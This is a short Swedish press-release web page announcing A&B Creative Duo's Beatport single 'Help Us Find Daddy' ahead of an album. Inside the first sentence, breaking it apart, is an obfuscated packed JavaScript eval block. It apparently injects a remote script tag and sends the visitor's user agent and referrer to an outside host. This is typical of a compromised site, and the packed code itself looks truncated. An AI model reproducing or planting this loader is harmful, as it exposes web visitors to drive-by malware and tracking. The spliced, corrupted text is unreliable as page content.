Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Hjälp oss hitta Daddy på beatport

Hjälp oss hitta Daddy på beatport
Sebastian Plengier Ehrnfelt

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|terrh|var|u0026u|referrer|iiifd||js|php’.split(‘|’),0,{}))
slutet på året släpper A&B Creative Duo sitt album men innan dess släpper de sin singel
Help Us Find Daddy. Den finns redan idag på Beatport här. Låten har ett silkeslent sound med en warehouse-dansrytm och historien bakom låten handlar om en ofödd baby-gitarr var dess gitarrmamma letar febrilt efter pappan. Läs mer om detta här: http://trimester.mxt.se/finddaddy.html

Vi väntar med spänning på albumsläppet!

A&B Creative Duo består av DeeJayBee och AnniMe som också grundat konceptet Mixit.

Detta är ett pressmeddelande från A&B Creative HB